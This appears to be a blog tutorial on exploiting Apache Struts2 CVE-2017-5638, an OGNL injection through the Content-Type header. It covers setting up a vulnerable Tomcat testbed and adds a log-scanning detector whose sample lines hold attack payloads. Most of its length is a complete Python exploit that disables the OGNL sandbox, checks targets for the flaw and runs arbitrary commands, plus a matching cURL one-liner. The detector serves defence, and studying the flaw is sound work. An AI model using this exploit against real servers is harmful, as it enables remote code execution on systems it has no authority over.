Exploiting The New Apache Struts2 Remote Code Execution [CVE-2017-5638]
A Glance at Apache Struts 2:-
Apache Struts 2 is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture. The WebWork framework spun off from Apache Struts aiming to offer enhancements and refinements while retaining the same general architecture of the original Struts framework. In December 2005, it was announced that WebWork 2.2 was adopted as Apache Struts 2, which reached its first full release in February 2007.
About CVE-2017-5638:-
Security researchers have disclosed a new remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts 2 (2.3.x before 2.3.32 and 2.5.x before 2.5.10.1). A crafted HTTP header is reflected into an error message that the framework then evaluates as an Object-Graph Navigation Language (OGNL) expression, and the flaw was being actively exploited in the wild at the time of disclosure (March 2017).
About the Exploit:-
The vulnerability is triggered by sending an HTTP request with a malformed Content-Type header to a Struts 2 application that uses the Jakarta Multipart parser (the default) for its file upload functionality. When the header value contains the string "multipart/form-data", Struts hands the request to the multipart parser; because the value is not a valid multipart content type, the parser throws an exception whose message echoes the header, and Struts evaluates that message as an OGNL expression. No real file upload is required: a plain GET to any action with the crafted header is enough.
An attacker can therefore execute a malicious command through the "Content-Type" HTTP header (the CVE also lists "Content-Disposition" and "Content-Length" variants), as shown in the screenshot below.
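On the defensive side, as an added example that is not part of the original post: the same property that makes the bug exploitable (a Content-Type value carrying an OGNL expression) makes attempts easy to spot, because no legitimate Content-Type ever contains `%{` or `${`. The script below flags such values and runs the check over a constructed Tomcat access log; it assumes the AccessLogValve pattern has `"%{Content-Type}i"` appended as the last quoted field, and the log lines and IP addresses are made up for the demonstration.

```python
import re
from urllib.parse import unquote

# A legitimate Content-Type never contains an OGNL expression opener.
# CVE-2017-5638 payloads start with %{ (or ${) and carry the decoy
# 'multipart/form-data' literal that satisfies the Struts dispatcher's
# contains() check before the Jakarta parser rejects the header.
OGNL_OPENER = re.compile(r"[%$]\{")
STRUTS_MARKERS = (
    "#_='multipart/form-data'",
    "#_memberAccess",
    "@ognl.OgnlContext@",
    "#cmd=",
    "java.lang.ProcessBuilder",
)


def is_struts_ognl_injection(content_type):
    """Return True when a Content-Type value looks like a CVE-2017-5638
    style OGNL injection attempt."""
    if not content_type or content_type == "-":
        return False
    # URL-decode once so a percent-encoded opener (%25%7B -> %{) is caught.
    value = unquote(content_type)
    if OGNL_OPENER.search(value):
        return True
    return any(marker in value for marker in STRUTS_MARKERS)


# Tomcat AccessLogValve line in the 'common' layout plus a trailing
# "%{Content-Type}i" field (assumed pattern, see lead-in):
#   %h %l %u %t "%r" %s %b "%{Content-Type}i"
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ctype>.*)"$'
)


def scan_access_log(text):
    """Return (client_ip, request_line, content_type) for every line whose
    Content-Type looks like an injection attempt."""
    hits = []
    for line in text.splitlines():
        m = ACCESS_LOG_RE.match(line)
        if m and is_struts_ognl_injection(m.group("ctype")):
            hits.append((m.group("ip"), m.group("req"), m.group("ctype")))
    return hits


# Constructed sample: two normal requests (one a genuine multipart upload),
# one raw attack and one with the opener percent-encoded.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [07/Mar/2017:10:14:01 +0000] "GET /struts2-showcase/showcase.action HTTP/1.1" 200 9213 "-"
192.0.2.11 - - [07/Mar/2017:10:14:09 +0000] "POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1" 200 4120 "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"
203.0.113.7 - - [07/Mar/2017:10:15:22 +0000] "GET /struts2-showcase/ HTTP/1.1" 200 5127 "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='id').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd}))}"
203.0.113.7 - - [07/Mar/2017:10:15:40 +0000] "GET /struts2-showcase/ HTTP/1.1" 200 5127 "%25%7B(%23_%3D'multipart/form-data').(%23cmd%3D'whoami')%7D"
"""

if __name__ == "__main__":
    for ip, req, ctype in scan_access_log(SAMPLE_ACCESS_LOG):
        print("%s  %s\n    Content-Type: %s" % (ip, req, ctype[:80]))
```

The genuine upload (a `multipart/form-data; boundary=...` value) is not flagged, while both attack lines are, including the percent-encoded one. Stock Tomcat access logs do not record request headers, so the `%{Content-Type}i` field has to be added to the valve pattern before this kind of review is possible; a WAF or IDS rule keyed on `%{(#` sees the header directly.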
Exploitation:-
Let's set up a testbed application and try to exploit the vulnerability on our own server.
Steps include:
1. Install the Apache Tomcat server.
2. Deploy a vulnerable version of Apache Struts.
3. Pwnage.
Installing Tomcat: -
We can install Tomcat using the apt-get package management tool on any Debian-based distribution.
Note: for this demo, we are using Ubuntu 14.04 Server.
$ sudo apt-get install tomcat7 tomcat7-admin
Once the Tomcat installation is done, we need to add a privileged user that can deploy applications through the Tomcat manager. This is done by editing the /etc/tomcat7/tomcat-users.xml file.
Add the line below inside the <tomcat-users> element of /etc/tomcat7/tomcat-users.xml. (Note: change the username and password as per your needs; "manager-gui" is the role the web manager requires.)
<user username="teampwner" password="teampwner" roles="manager-gui,admin-gui" />
Once done, restart the Tomcat service (the service is named tomcat7 on this release).
$ sudo service tomcat7 restart
Now you will be able to access the Tomcat Web Application Manager on port 8080 (http://127.0.0.1:8080/manager/html).
Now we need to deploy a vulnerable version of Apache Struts. Struts 2.3.15 (any 2.3.x release before 2.3.32 is affected) can be downloaded here.
Extract the zip file and you will find all the Apache Struts files. For the purposes of this blog, we'll use the struts2-showcase.war demo; the war file is in the "apps" directory of the archive you just downloaded.
Log in to the Tomcat Web Application Manager (http://127.0.0.1:8080/manager/html) using the credentials you just set up and scroll down to the "WAR file to deploy" section to upload the war file.
Once the application is successfully deployed, it will be listed on the manager page under Applications. Click on its link (/struts2-showcase) and you'll reach the Struts app you just deployed.
Pwnage: -
In this section, we will exploit this vulnerability using a publicly available exploit as well as cURL.
Using the Exploit: -
The exploit can be found here.
Let's check whether the application is vulnerable.
From the exploit's output, we can determine that the application is indeed vulnerable. Now let's try to execute some system commands; for the purpose of this blog, we will execute the "id" command.
As shown in the screenshot above, we can now execute system commands on the target server remotely.
Using cURL: -
We will use the Content-Type value shown below as the payload.
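The same request, as an added example that is not the exploit script or the cURL screenshot from the original post: a standard-library Python script that carries the publicly circulated OGNL payload in the Content-Type header, prints the equivalent cURL one-liner, and checks for the vulnerability before running a command. The TARGET URL below is assumed to be the showcase app deployed above, and the vulnerability check assumes a /bin/bash on the target (the same shell the payload itself uses on non-Windows hosts).

```python
"""Added example (not the original post's script): drive CVE-2017-5638
with only the Python standard library.

The OGNL below is the publicly circulated payload; TARGET and the shell
arithmetic used by the vulnerability check are this example's assumptions.
"""
import argparse
import random
import shlex
import urllib.error
import urllib.request

TARGET = "http://127.0.0.1:8080/struts2-showcase/"  # assumed testbed URL

# The leading (#_='multipart/form-data') satisfies the Struts dispatcher's
# contains("multipart/form-data") check, so the request reaches the Jakarta
# parser; the parser rejects the header, echoes it into the exception
# message, and Struts evaluates that message as OGNL. The rest disables the
# OGNL sandbox (memberAccess / excluded classes), runs __CMD__ and copies
# stdout+stderr straight into the servlet output stream.
PAYLOAD_TEMPLATE = (
    "%{(#_='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):"
    "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    "(#ognlUtil.getExcludedPackageNames().clear())."
    "(#ognlUtil.getExcludedClasses().clear())."
    "(#context.setMemberAccess(#dm))))."
    "(#cmd='__CMD__')."
    "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    "(#p=new java.lang.ProcessBuilder(#cmds))."
    "(#p.redirectErrorStream(true))."
    "(#process=#p.start())."
    "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    "(#ros.flush())}"
)


def build_payload(cmd):
    """Content-Type value that makes a vulnerable Struts 2 run `cmd`."""
    # The command lands inside an OGNL single-quoted literal; refuse
    # characters that would break out of it rather than try to escape them.
    if "'" in cmd or "\\" in cmd:
        raise ValueError("command must not contain ' or \\; stage a script on the target instead")
    return PAYLOAD_TEMPLATE.replace("__CMD__", cmd)


def curl_command(url, cmd):
    """The equivalent one-liner for reproducing the request with cURL."""
    return "curl -s -H %s %s" % (shlex.quote("Content-Type: " + build_payload(cmd)), shlex.quote(url))


def run_command(url, cmd, timeout=10):
    """Send the crafted header and return the response body as text.

    The command output is written to the response stream before Struts
    finishes erroring out, so it may arrive with a 4xx/5xx status; read the
    body in that case too. No file upload (or even a request body) is needed."""
    req = urllib.request.Request(url, headers={"Content-Type": build_payload(cmd)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def is_vulnerable(url, timeout=10):
    """Ask the target's shell to compute a sum that is never sent in the clear.

    Echoing a fixed token would give a false positive on any server that
    merely reflects the Content-Type header into an error page; the sum only
    appears if the command actually ran (assumes /bin/bash on the target)."""
    a, b = random.randint(10**8, 10**9), random.randint(10**8, 10**9)
    body = run_command(url, "echo $((%d+%d))" % (a, b), timeout=timeout)
    return str(a + b) in body


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="CVE-2017-5638 check and command runner")
    ap.add_argument("url", nargs="?", default=TARGET)
    ap.add_argument("-c", "--cmd", default="id")
    args = ap.parse_args()
    print("cURL equivalent:\n  " + curl_command(args.url, args.cmd))
    try:
        if is_vulnerable(args.url):
            print("[+] vulnerable; output of %r:\n%s" % (args.cmd, run_command(args.url, args.cmd)))
        else:
            print("[-] not vulnerable (or the sandbox bypass did not apply)")
    except urllib.error.URLError as exc:
        print("[!] request failed: %s" % exc)
```

Run it as `python3 struts_5638.py http://127.0.0.1:8080/struts2-showcase/ -c id` against the testbed; the printed cURL line is the manual equivalent, with the whole header single-quoted by shlex so the `'` and `@` characters in the OGNL survive the shell. Because the header is the only thing that matters, the method (GET or POST) and the path (any Struts action) are interchangeable.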
Credits: -
https://www.cvedetails.com/cve/CVE-2017-5638/
http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
https://en.wikipedia.org/wiki/Apache_Struts_2
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
https://en.wikipedia.org/wiki/List_of_HTTP_header_fields
http://colesec.inventedtheinternet.com/hacking-apache-struts/